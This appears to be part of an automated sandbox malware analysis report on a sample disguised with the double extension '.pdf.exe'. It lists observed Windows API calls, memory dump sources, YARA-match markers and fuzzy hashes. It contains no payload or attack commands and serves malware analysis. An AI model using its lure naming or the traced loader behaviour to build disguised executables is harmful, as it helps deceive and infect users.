                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                                                                • Opcode ID: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c53a9e6d3058dca37beeabd02d44a48c35e66880a6f017140af95933dd167f22
                                                                                                                                                                                                                                • Instruction ID: 365a5628b02d3196191055f806d3a4da007d44ea85996db0ff700aef341e76ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c53a9e6d3058dca37beeabd02d44a48c35e66880a6f017140af95933dd167f22
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD31E175A043ADDFCF349E688D547EA37A6AF1A760F84012ADC9DCB302D3708A42CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,-09075E35,-C761E599,-BC93AC97), ref: 0245B0A3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: a47c672fd4c8e34cf6fd9033c43b6a70bcc1ca3cb293d94984ecd6f445a9a73c
                                                                                                                                                                                                                                • Instruction ID: a86be888fe9992c5b2fec6c17cda84d1f60648fb159676ac53c0faf7ba504b1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47c672fd4c8e34cf6fd9033c43b6a70bcc1ca3cb293d94984ecd6f445a9a73c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B2138F2244259DFCB788E348C68BFB36A69F58740F90411FDC4A9B244D7308A41CB01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: fc60d92d3f5e881f6d7725fbb5d43ee8094aa3c79a0f1ae080a0465d8fe11e85
                                                                                                                                                                                                                                • Instruction ID: 0b592ce95714614512dbf0665fc3148110cd0d9e2666c4c365ddbea76391e2af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc60d92d3f5e881f6d7725fbb5d43ee8094aa3c79a0f1ae080a0465d8fe11e85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921D270A4035EDFCF30AE68CD687DE37A6AF19760F94012AEC99CB201D7308A428B10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: fdeb51c3739d3a4bb1f704109385b5d3ce6cc1316f17a469e17b858443a4ebd3
                                                                                                                                                                                                                                • Instruction ID: 02d88a383b1354527b485e8fb577f5b7510ed62c32c51b8bfcfbfef49c6b511c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdeb51c3739d3a4bb1f704109385b5d3ce6cc1316f17a469e17b858443a4ebd3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61019670B4035EDBCB30EE698D947DE37AA9F19760F84412BDC99CB206D37096468B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • TerminateProcess.KERNELBASE(-4D6F3B6E,405A78C6), ref: 0245AC9A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProcessTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 560597551-0
                                                                                                                                                                                                                                • Opcode ID: 1589fa0e80cc14bd6887db7ea5c671364ced531e600dc5790146c15a9f52a0fa
                                                                                                                                                                                                                                • Instruction ID: 6b7592396135eb61445e072cc701767f8819b4d93fe19c3c2c29488fbb6c0346
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1589fa0e80cc14bd6887db7ea5c671364ced531e600dc5790146c15a9f52a0fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F0272034831A8FE7255D358D5A3DB37A3FF91280F85822ECC9983048C33585818B03
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(7149505C,00000004,00000040,7149504C), ref: 71492A9D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                • Opcode ID: dc208dda6eafdc9a361c52d9287294cb55b840819d1ede71293ad54627a938fb
                                                                                                                                                                                                                                • Instruction ID: f923869caf169b1742ee17cebb98b25462cc35ad8e7a4be9ba1834af30933f9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc208dda6eafdc9a361c52d9287294cb55b840819d1ede71293ad54627a938fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F0AEF2A09280DEC351CF2B8445B093FF0B76A304B35462BE188FE241E3344046DB95
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnumWindows
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1129996299-0
                                                                                                                                                                                                                                • Opcode ID: 14f8010e2c8e59abf5757123f95fee881161beb2c4ec6395f2bd549c0512ba66
                                                                                                                                                                                                                                • Instruction ID: 252bdcaeadeebd790110c23340d18b388410bacb45602dddd1c89554fef0fc11
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14f8010e2c8e59abf5757123f95fee881161beb2c4ec6395f2bd549c0512ba66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8D022330204088FC736CE50A8483C62710FB80010F684813C218CBA88C230AA0383E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,714912DB,?,7149137F,00000019,714911CA,-000000A0), ref: 714912C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                • String ID:
